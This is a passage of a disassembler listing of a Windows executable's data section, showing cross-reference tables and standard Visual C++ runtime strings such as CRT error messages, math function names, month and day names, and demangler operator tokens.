; sub_41802F+DF�r ...
dword_41D244 dd 80000074h ; DATA XREF: seg000:loc_41C056�r
dword_41D248 dd 80000005h ; DATA XREF: sub_418552+4C9�r
dword_41D24C dd 80000014h ; DATA XREF: sub_41B3D0+F7�r
dword_41D250 dd 80000015h ; DATA XREF: sub_41B5D2+58�r
dword_41D254 dd 8000000Fh ; DATA XREF: sub_41B3D0+131�r
; sub_41B3D0+147�r ...
dword_41D258 dd 80000012h ; DATA XREF: sub_41397C+8F�r
; sub_41B5D2+F4�r
dword_41D25C dd 80000011h ; DATA XREF: sub_41B3D0+11C�r
; sub_41B5D2+12C�r
dword_41D260 dd 8000000Ch ; DATA XREF: sub_41A9DE+3C�r
; sub_41A9DE+76F�r ...
dd 8000000Bh
dword_41D268 dd 8000000Ah ; DATA XREF: sub_41397C+54�r
dword_41D26C dd 80000002h ; DATA XREF: sub_418B1F+D7�r
; sub_41B5D2+9E�r
dword_41D270 dd 80000010h ; DATA XREF: sub_417F01+51�r
; sub_418552+85�r
dword_41D274 dd 80000073h ; DATA XREF: seg000:0041BF9C�r
dword_41D278 dd 80000009h ; DATA XREF: sub_41397C+34�r
; sub_41802F+C7�r ...
dword_41D27C dd 80000017h ; DATA XREF: sub_41397C+20�r
; sub_41802F+2F�r ...
dword_41D280 dd 80000033h ; DATA XREF: sub_418552+4F9�r
align 8
dword_41D288 dd 0 ; DATA XREF: sub_407979+49�o
dd offset loc_41C370
dd offset loc_41C38D
dd offset loc_41C3AA
dd offset loc_41C3C6
dd offset loc_41C3E2
dd offset loc_41C3FE
dd offset loc_41C41A
dd offset loc_41C436
dd offset loc_41C444
dd offset loc_41C460
dd offset loc_41C47C
dword_41D2B8 dd 0 ; DATA XREF: sub_407979+50�o
dword_41D2BC dd 0 ; DATA XREF: sub_407979+2D�o
dd offset sub_402DB6
dd offset sub_404E03
dd offset sub_40808A
dd offset sub_40A6DB
dd offset sub_40F839
dd offset sub_40B18A
dword_41D2D8 dd 0 ; DATA XREF: sub_407979+28�o
dword_41D2DC dd 0 ; DATA XREF: sub_407A0B+73�o
dd offset sub_41144A
dd offset sub_40813B
dword_41D2E8 dd 0 ; DATA XREF: sub_407A0B:loc_407A79�o
dword_41D2EC dd 0 ; DATA XREF: sub_407A0B+83�o
dd offset sub_40B1AB
dword_41D2F4 dd 3 dup(0) ; DATA XREF: sub_407A0B:loc_407A89�o
dword_41D300 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 420F64h
; DATA XREF: seg002:00423000�o
; seg002:00423004�o ...
off_41D314 dd offset loc_401043 ; DATA XREF: sub_401038�o
; seg000:00401046�o ...
dd offset sub_402CE0
dd offset dword_420F18
off_41D320 dd offset loc_4010C5 ; DATA XREF: sub_401065+20�o
; sub_40109A+A�o ...
dd offset sub_4010B7
dd offset dword_420EC8
off_41D32C dd offset loc_4010EC ; DATA XREF: seg000:loc_4010E1�o
; seg000:004010EF�o ...
dd offset sub_4010B7
dd offset dword_420D88
off_41D338 dd offset loc_402658 ; DATA XREF: sub_40264D�o
; seg000:0040265B�o ...
dd offset sub_4010B7
aStringTooLong db 'string too long',0
aInvalidStringP db 'invalid string position',0
dd offset dword_420DD8
off_41D36C dd offset loc_402CED ; DATA XREF: sub_402BFB+A�o
; sub_402C0C+9�o ...
dd offset sub_402CE0
aUnknownExcepti db 'Unknown exception',0
align 4
dd offset dword_420DEC
off_41D38C dd offset loc_402FFB ; DATA XREF: sub_402FED+1�o
; seg002:off_423008�o ...
oword_41D390 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_403DA0+E3�r
; sub_403DA0+10A�r
oword_41D3A0 xmmword 4330000000000000433h ; DATA XREF: sub_403DA0+46�r
oword_41D3B0 xmmword 0 ; DATA XREF: sub_403DA0:loc_403EA1�r
oword_41D3C0 xmmword 7FFh ; DATA XREF: sub_403DA0+5F�r
dbl_41D3D0 db 0, 0, 0, 0, 0, 0, 0, 80h ; DATA XREF: sub_403DA0:loc_403E9A�r
dword_41D3D8 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_4041BB+E�o
dd 3, 19930520h, 2 dup(0)
off_41D3F8 dd offset dword_425AA0 ; DATA XREF: sub_40468E+D4�o
dd offset dword_425AF8
dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
byte_41D480 db 3Dh, 0 ; DATA XREF: seg001:0041EB90�o
word_41D482 dw 0 ; DATA XREF: sub_40AB84+1B�o
; seg001:0041EB70�o ...
aEncodepointer db 'EncodePointer',0 ; DATA XREF: sub_405127+43�o
; sub_405266+2E�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_405127:loc_40515B�o
; sub_405193:loc_4051C7�o ...
align 4
aDecodepointer db 'DecodePointer',0 ; DATA XREF: sub_405193+43�o
; sub_405266+42�o
align 4
aFlsfree db 'FlsFree',0 ; DATA XREF: sub_4054D6+44�o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: sub_4054D6+37�o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: sub_4054D6+2A�o
dword_41D4D4 dd 41736C46h ; DATA XREF: sub_4054D6+22�o
byte_41D4D8 db 6Ch ; DATA XREF: sub_4069D7+177�r
db 6Ch, 6Fh, 63h
align 10h
aNull: ; DATA XREF: seg002:off_423928�o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: seg002:off_423924�o
align 4
byte_41D4F8 db 6 ; DATA XREF: sub_4069D7:loc_406B60�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38202800h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707800h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_407881+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_407881�o
aCcs db 'ccs=',0 ; DATA XREF: sub_4081FF+1CC�o
align 4
aUtf8 db 'UTF-8',0 ; DATA XREF: sub_4081FF+1E0�o
align 10h
aUtf16le db 'UTF-16LE',0 ; DATA XREF: sub_4081FF:loc_4083FC�o
align 4
aUnicode db 'UNICODE',0 ; DATA XREF: sub_4081FF:loc_408419�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6034AnApplica db 'R6034',0Dh,0Ah
db 'An application has made an attempt to load the C runtime library '
db 'incorrectly.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 8
aR6033AttemptTo db 'R6033',0Dh,0Ah
db '- Attempt to use MSIL code from this assembly during native code '
db 'initialization',0Ah
db 'This indicates a bug in your application. It is most likely the r'
db 'esult of calling an MSIL-compiled (/clr) function from a native c'
db 'onstructor or from DllMain.',0Dh,0Ah,0
align 10h
aR6032NotEnough db 'R6032',0Dh,0Ah
db '- not enough space for locale information',0Dh,0Ah,0
align 8
aR6031AttemptTo db 'R6031',0Dh,0Ah
db '- Attempt to initialize the CRT more than once.',0Ah
db 'This indicates a bug in your application.',0Dh,0Ah,0
align 4
aR6030CrtNotIni db 'R6030',0Dh,0Ah
db '- CRT not initialized',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: seg002:off_423C04�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_409AB4+157�o
align 10h
asc_41DB10 db 0Ah ; DATA XREF: sub_409AB4:loc_409BC4�o
db 0Ah,0
align 4
a___ db '...',0 ; DATA XREF: sub_409AB4+E8�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_409AB4+A3�o
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_409AB4+5B�o
db 0Ah
db 'Program: ',0
align 4
dd 2 dup(0)
dd 7FF00000h, 0
dd 0FFF00000h, 0
dd 7FE00000h, 0
dd 200000h, 3 dup(0)
dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h, 0FFC00000h
dd 0
dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h, 8DA24260h
dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
dword_41DBB8 dd 6E6174h ; DATA XREF: sub_40A42B:loc_40A663�o
dword_41DBBC dd 736F63h ; DATA XREF: sub_40A42B:loc_40A65A�o
dword_41DBC0 dd 6E6973h ; DATA XREF: sub_40A42B:loc_40A651�o
aModf db 'modf',0 ; DATA XREF: sub_40A42B:loc_40A645�o
align 4
aFloor db 'floor',0 ; DATA XREF: sub_40A42B:loc_40A639�o
align 4
aCeil db 'ceil',0 ; DATA XREF: sub_40A42B:loc_40A630�o
align 4
aAtan db 'atan',0 ; DATA XREF: sub_40A42B:loc_40A627�o
align 4
aExp10 db 'exp10',0 ; DATA XREF: sub_40A42B+1BF�o
align 10h
dbl_41DBF0 dq 1.0 ; DATA XREF: sub_40A6EF+6D�r
aAcos db 'acos',0 ; DATA XREF: sub_40A42B:loc_40A5AE�o
align 10h
aAsin db 'asin',0 ; DATA XREF: sub_40A42B:loc_40A5A5�o
align 4
aLog db 'log',0 ; DATA XREF: sub_40A42B:loc_40A568�o
; sub_40A42B+149�o ...
aLog10 db 'log10',0 ; DATA XREF: sub_40A42B:loc_40A541�o
; sub_40A42B+131�o ...
align 4
aExp db 'exp',0 ; DATA XREF: sub_40A42B:loc_40A508�o
; sub_40A42B+10D�o ...
aPow db 'pow',0 ; DATA XREF: sub_40A42B:loc_40A4D3�o
; sub_40A42B:loc_40A580�o ...
off_41DC1C dd offset sub_40B3C2 ; DATA XREF: sub_406640+F1�r
; sub_406640+FA�o ...
dd offset dword_420E34
off_41DC24 dd offset loc_40B1DA ; DATA XREF: sub_40B1CF�o
; seg000:0040B1DD�o ...
dd offset sub_402CE0
dword_41DC2C dd 20646162h, 65637865h, 6F697470h, 6Eh ; DATA XREF: sub_40BA07+156�o
dword_41DC3C dd 41h dup(0) ; DATA XREF: sub_40BF57+25�o
; sub_40C33C+27�o
asc_41DD40: ; DATA XREF: seg002:off_423668�o
; seg002:00423E70�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_41DF40 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: seg002:00423E74�o
; seg002:00423590�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
dword_41E148 dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch
dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: seg002:00423F1C�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: seg002:00423F18�o
align 4
aPm db 'PM',0 ; DATA XREF: seg002:00423F14�o
align 4
aAm db 'AM',0 ; DATA XREF: seg002:00423F10�o
align 4
aDecember db 'December',0 ; DATA XREF: seg002:00423F0C�o
align 4
aNovember db 'November',0 ; DATA XREF: seg002:00423F08�o
align 4
aOctober db 'October',0 ; DATA XREF: seg002:00423F04�o
aSeptember db 'September',0 ; DATA XREF: seg002:00423F00�o
align 4
aAugust db 'August',0 ; DATA XREF: seg002:00423EFC�o
align 10h
aJuly db 'July',0 ; DATA XREF: seg002:00423EF8�o
align 4
aJune db 'June',0 ; DATA XREF: seg002:00423EF4�o
align 10h
aApril db 'April',0 ; DATA XREF: seg002:00423EEC�o
align 4
aMarch db 'March',0 ; DATA XREF: seg002:00423EE8�o
align 10h
aFebruary db 'February',0 ; DATA XREF: seg002:00423EE4�o
align 4
aJanuary db 'January',0 ; DATA XREF: seg002:00423EE0�o
aDec db 'Dec',0 ; DATA XREF: seg002:00423EDC�o
aNov db 'Nov',0 ; DATA XREF: seg002:00423ED8�o
aOct db 'Oct',0 ; DATA XREF: seg002:00423ED4�o
aSep db 'Sep',0 ; DATA XREF: seg002:00423ED0�o
aAug db 'Aug',0 ; DATA XREF: seg002:00423ECC�o
aJul db 'Jul',0 ; DATA XREF: seg002:00423EC8�o
aJun db 'Jun',0 ; DATA XREF: seg002:00423EC4�o
aMay db 'May',0 ; DATA XREF: seg002:00423EC0�o
; seg002:00423EF0�o
aApr db 'Apr',0 ; DATA XREF: seg002:00423EBC�o
aMar db 'Mar',0 ; DATA XREF: seg002:00423EB8�o
aFeb db 'Feb',0 ; DATA XREF: seg002:00423EB4�o
aJan db 'Jan',0 ; DATA XREF: seg002:00423EB0�o
aSaturday db 'Saturday',0 ; DATA XREF: seg002:00423EAC�o
align 10h
aFriday db 'Friday',0 ; DATA XREF: seg002:00423EA8�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: seg002:00423EA4�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: seg002:00423EA0�o
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: seg002:00423E9C�o
aMonday db 'Monday',0 ; DATA XREF: seg002:00423E98�o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: seg002:00423E94�o
align 4
aSat db 'Sat',0 ; DATA XREF: seg002:00423E90�o
aFri db 'Fri',0 ; DATA XREF: seg002:00423E8C�o
aThu db 'Thu',0 ; DATA XREF: seg002:00423E88�o
aWed db 'Wed',0 ; DATA XREF: seg002:00423E84�o
aTue db 'Tue',0 ; DATA XREF: seg002:00423E80�o
aMon db 'Mon',0 ; DATA XREF: seg002:00423E7C�o
aSun db 'Sun',0 ; DATA XREF: seg002:off_423E78�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_40CB14+53�o
align 4
aKernel32_dl_10 db 'kernel32.dll',0 ; DATA XREF: sub_40CB14+44�o
align 4
aCompleteObject db ' Complete Object Locator',27h,0 ; DATA XREF: seg001:0041EB84�o
align 4
aClassHierarchy db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: seg001:0041EB80�o
align 4
aBaseClassArray db ' Base Class Array',27h,0 ; DATA XREF: seg001:0041EB7C�o
align 4
aBaseClassDescr db ' Base Class Descriptor at (',0 ; DATA XREF: seg001:0041EB78�o
aTypeDescriptor db ' Type Descriptor',27h,0 ; DATA XREF: seg001:0041EB74�o
align 4
aLocalStaticThr db '`local static thread guard',27h,0 ; DATA XREF: seg001:0041ECC0�o
aManagedVectorC db '`managed vector copy constructor iterator',27h,0
; DATA XREF: seg001:0041ECBC�o
align 4
aVectorVbaseCop db '`vector vbase copy constructor iterator',27h,0
; DATA XREF: seg001:0041ECB8�o
align 10h
aVectorCopyCons db '`vector copy constructor iterator',27h,0 ; DATA XREF: seg001:0041ECB4�o
align 4
aDynamicAtexitD db '`dynamic atexit destructor for ',27h,0 ; DATA XREF: seg001:0041ECB0�o
align 4
aDynamicInitial db '`dynamic initializer for ',27h,0 ; DATA XREF: seg001:0041ECAC�o
align 4
aEhVectorVbaseC db '`eh vector vbase copy constructor iterator',27h,0
; DATA XREF: seg001:0041ECA8�o
aEhVectorCopyCo db '`eh vector copy constructor iterator',27h,0
; DATA XREF: seg001:0041ECA4�o
align 4
aManagedVectorD db '`managed vector destructor iterator',27h,0 ; DATA XREF: seg001:0041ECA0�o
align 10h
aManagedVecto_0 db '`managed vector constructor iterator',27h,0
; DATA XREF: seg001:0041EC9C�o
align 4
aPlacementDelet db '`placement delete[] closure',27h,0 ; DATA XREF: seg001:0041EC98�o
align 4
aPlacementDel_0 db '`placement delete closure',27h,0 ; DATA XREF: seg001:0041EC94�o
align 4
aOmniCallsig db '`omni callsig',27h,0 ; DATA XREF: seg001:0041EC90�o
align 4
aDelete db ' delete[]',0 ; DATA XREF: seg001:0041EC8C�o
align 10h
aNew db ' new[]',0 ; DATA XREF: seg001:0041EC88�o
align 4
aLocalVftableCo db '`local vftable constructor closure',27h,0 ; DATA XREF: seg001:0041EC84�o
aLocalVftable db '`local vftable',27h,0 ; DATA XREF: seg001:0041EC80�o
aRtti db '`RTTI',0 ; DATA XREF: seg001:0041EC7C�o
align 4
aEh db '`EH',0 ; DATA XREF: seg001:0041EC78�o
aUdtReturning db '`udt returning',27h,0 ; DATA XREF: seg001:0041EC74�o
aCopyConstructo db '`copy constructor closure',27h,0 ; DATA XREF: seg001:0041EC70�o
align 4
aEhVectorVbas_0 db '`eh vector vbase constructor iterator',27h,0
; DATA XREF: seg001:0041EC6C�o
align 4
aEhVectorDestru db '`eh vector destructor iterator',27h,0 ; DATA XREF: seg001:0041EC68�o
aEhVectorConstr db '`eh vector constructor iterator',27h,0 ; DATA XREF: seg001:0041EC64�o
align 10h
aVirtualDisplac db '`virtual displacement map',27h,0 ; DATA XREF: seg001:0041EC60�o
align 4
aVectorVbaseCon db '`vector vbase constructor iterator',27h,0 ; DATA XREF: seg001:0041EC5C�o
aVectorDestruct db '`vector destructor iterator',27h,0 ; DATA XREF: seg001:0041EC58�o
align 10h
aVectorConstruc db '`vector constructor iterator',27h,0 ; DATA XREF: seg001:0041EC54�o
align 10h
aScalarDeleting db '`scalar deleting destructor',27h,0 ; DATA XREF: seg001:0041EC50�o
align 10h
aDefaultConstru db '`default constructor closure',27h,0 ; DATA XREF: seg001:0041EC4C�o
align 10h
aVectorDeleting db '`vector deleting destructor',27h,0 ; DATA XREF: seg001:0041EC48�o
align 10h
aVbaseDestructo db '`vbase destructor',27h,0 ; DATA XREF: seg001:0041EC44�o
align 4
aString db '`string',27h,0 ; DATA XREF: seg001:0041EC40�o
align 10h
aLocalStaticGua db '`local static guard',27h,0 ; DATA XREF: seg001:0041EC3C�o
align 4
aTypeof db '`typeof',27h,0 ; DATA XREF: seg001:0041EC38�o
align 4
aVcall db '`vcall',27h,0 ; DATA XREF: seg001:0041EC34�o
aVbtable db '`vbtable',27h,0 ; DATA XREF: seg001:0041EC30�o
align 4
aVftable db '`vftable',27h,0 ; DATA XREF: seg001:0041EC2C�o
align 4
asc_41EA24 db '^=',0 ; DATA XREF: seg001:0041EC28�o
align 4
asc_41EA28 db '|=',0 ; DATA XREF: seg001:0041EC24�o
align 4
asc_41EA2C db '&=',0 ; DATA XREF: seg001:0041EC20�o
align 10h
asc_41EA30 db '<<=',0 ; DATA XREF: seg001:0041EC1C�o
asc_41EA34 db '>>=',0 ; DATA XREF: seg001:0041EC18�o
asc_41EA38 db '%=',0 ; DATA XREF: seg001:0041EC14�o
align 4
asc_41EA3C db '/=',0 ; DATA XREF: seg001:0041EC10�o
align 10h
asc_41EA40 db '-=',0 ; DATA XREF: seg001:0041EC0C�o
align 4
asc_41EA44 db '+=',0 ; DATA XREF: seg001:0041EC08�o
align 4
asc_41EA48 db '*=',0 ; DATA XREF: seg001:0041EC04�o
align 4
asc_41EA4C db '||',0 ; DATA XREF: seg001:0041EC00�o
align 10h
asc_41EA50 db '&&',0 ; DATA XREF: seg001:0041EBFC�o
align 4
asc_41EA54: ; DATA XREF: seg001:0041EBF8�o
unicode 0, <|>,0
asc_41EA58: ; DATA XREF: seg001:0041EBF4�o
unicode 0, <^>,0
asc_41EA5C: ; DATA XREF: seg001:0041EBF0�o
unicode 0, <~>,0
asc_41EA60 db '()',0 ; DATA XREF: seg001:0041EBEC�o
align 4
asc_41EA64: ; DATA XREF: seg001:0041EBE8�o
unicode 0, <,>,0
asc_41EA68 db '>=',0 ; DATA XREF: seg001:0041EBE4�o
align 4
asc_41EA6C: ; DATA XREF: seg001:0041EBE0�o
dw 3Eh
unicode 0, <>,0
asc_41EA70 db '<=',0 ; DATA XREF: seg001:0041EBDC�o
align 4
asc_41EA74: ; DATA XREF: seg001:0041EBD8�o
dw 3Ch
unicode 0, <>,0
asc_41EA78: ; DATA XREF: seg001:0041EBD4�o
unicode 0, <%>,0
asc_41EA7C: ; DATA XREF: seg001:0041EBD0�o
unicode 0, </>,0
asc_41EA80 db '->*',0 ; DATA XREF: seg001:0041EBCC�o
asc_41EA84: ; DATA XREF: seg001:0041EBC8�o
unicode 0, <&>,0
asc_41EA88: ; DATA XREF: seg001:0041EBC4�o
unicode 0, <+>,0
asc_41EA8C: ; DATA XREF: seg001:0041EBC0�o
unicode 0, <->,0
asc_41EA90 db '--',0 ; DATA XREF: seg001:0041EBBC�o
align 4
asc_41EA94 db '++',0 ; DATA XREF: seg001:0041EBB8�o
align 4
asc_41EA98: ; DATA XREF: seg001:0041EBB4�o
unicode 0, <*>,0
asc_41EA9C db '->',0 ; DATA XREF: seg001:0041EBB0�o
align 10h
aOperator db 'operator',0 ; DATA XREF: seg001:0041EBAC�o
align 4
asc_41EAAC db '[]',0 ; DATA XREF: seg001:0041EBA8�o
align 10h
asc_41EAB0 db '!=',0 ; DATA XREF: seg001:0041EBA4�o
align 4
asc_41EAB4 db '==',0 ; DATA XREF: seg001:0041EBA0�o
align 4
asc_41EAB8: ; DATA XREF: seg001:0041EB9C�o
unicode 0, <!>,0
asc_41EABC db '<<',0 ; DATA XREF: seg001:0041EB98�o
align 10h
asc_41EAC0 db '>>',0 ; DATA XREF: seg001:0041EB94�o
align 4
aDelete_0 db ' delete',0 ; DATA XREF: seg001:0041EB8C�o
aNew_0 db ' new',0 ; DATA XREF: seg001:0041EB88�o
align 4
a__unaligned db '__unaligned',0 ; DATA XREF: seg001:0041EB6C�o
a__restrict db '__restrict',0 ; DATA XREF: seg001:0041EB68�o
align 4
; a__ptr64
a__ptr64 db '__ptr64',0 ; DATA XREF: seg001:0041EB64�o
a__clrcall db '__clrcall',0 ; DATA XREF: seg001:0041EB60�o
align 10h
a__fastcall db '__fastcall',0 ; DATA XREF: seg001:0041EB5C�o
align 4
a__thiscall db '__thiscall',0 ; DATA XREF: seg001:0041EB58�o
align 4
a__stdcall db '__stdcall',0 ; DATA XREF: seg001:0041EB54�o
align 4
a__pascal db '__pascal',0 ; DATA XREF: seg001:0041EB50�o
align 10h
a__cdecl db '__cdecl',0 ; DATA XREF: seg001:0041EB4C�o
a__based db '__based(',0 ; DATA XREF: seg001:0041EB48�o
align 8
dd offset a__based ; "__based("
dd offset a__cdecl ; "__cdecl"
dd offset a__pascal ; "__pascal"
dd offset a__stdcall ; "__stdcall"
dd offset a__thiscall ; "__thiscall"
dd offset a__fastcall ; "__fastcall"
dd offset a__clrcall ; "__clrcall"
dd offset a__ptr64 ; "__ptr64"
dd offset a__restrict ; "__restrict"
dd offset a__unaligned ; "__unaligned"
dd offset word_41D482
dd offset aTypeDescriptor ; " Type Descriptor'"
dd offset aBaseClassDescr ; " Base Class Descriptor at ("
dd offset aBaseClassArray ; " Base Class Array'"
dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
dd offset aCompleteObject ; " Complete Object Locator'"
dd offset aNew_0 ; " new"
dd offset aDelete_0 ; " delete"
dd offset byte_41D480
dd offset asc_41EAC0 ; ">>"
dd offset asc_41EABC ; "<<"
dd offset asc_41EAB8 ; "!"
dd offset asc_41EAB4 ; "=="
dd offset asc_41EAB0 ; "!="
dd offset asc_41EAAC ; "[]"
dd offset aOperator ; "operator"
dd offset asc_41EA9C ; "->"
dd offset asc_41EA98 ; "*"
dd offset asc_41EA94 ; "++"
